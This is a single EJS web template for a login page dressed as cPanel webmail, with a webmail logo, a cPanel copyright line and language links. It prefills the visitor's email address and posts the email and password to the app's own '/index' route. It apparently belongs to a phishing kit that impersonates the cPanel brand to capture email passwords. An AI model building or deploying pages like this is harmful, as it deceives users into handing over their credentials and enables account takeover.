<%- include('header'); -%>
<html lang="en" dir="ltr">

  <body>
      <div class="container">
      <div class="heading">
        <img src="images/download2.jpg" alt="webmail">
      </div>
      <form class="" action="/index" method="post">
        <div class="input-container">

            <label for="name">Email Address</label>
            <br>
            <div class="email">
              <i class="fa fa-user icon"></i>
              <input class="input-field" type="email" placeholder="Enter your email address." name="email" value="<%=username%>" size="30px">
          </div>


            <label for="name">Password</label>
            <br>
            <div class="password">
            <i class="fa fa-lock icon" aria-hidden="true"></i>
            <input class="input-field" type="password" placeholder="Enter your email password." name="password"  size="30px" minlength="6">
          </div>

        <br>
        <div class="submit">
          <button type="submit" class="">Log in</button>
        </div>
          </div>
    </div>


<div class="">
  <ul class="nav  nav-fill">
    <li class="nav-item">
      <a class="nav-link active" aria-current="page" href="?locale=ar">العربية</a>
    </li>
    <li class="nav-item">
      <a class="nav-link" href="?locale=bg">български</a>
    </li>
    <li class="nav-item">
      <a class="nav-link" href="?locale=bn">বাংলা</a>
    </li>
    <li class="nav-item">
      <a class="nav-link" href="?locale=da">dansk</a>
    </li>
    <li class="nav-item">
      <a class="nav-link" href="?locale=de">Deutsch</a>
    </li>
    <li class="nav-item">
      <a class="nav-link" href="?locale=el">Ελληνικά</a>
    </li>
    <li class="nav-item">
      <a class="nav-link" href="locale=es">español</a>
    </li>
    <li class="nav-item">
      <a class="nav-link" href="#" type="button">. . .</a>
    </li>

  </ul>
</div>

<div class="footer">
  <footer>
<img src="images/images.png" alt="cp">
  </footer>
  <p>Copyright 2023 cPanel, L.L.C
    <br>Privacy Policy
  </p>
</div>




    </form>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script>
  </body>
</html>
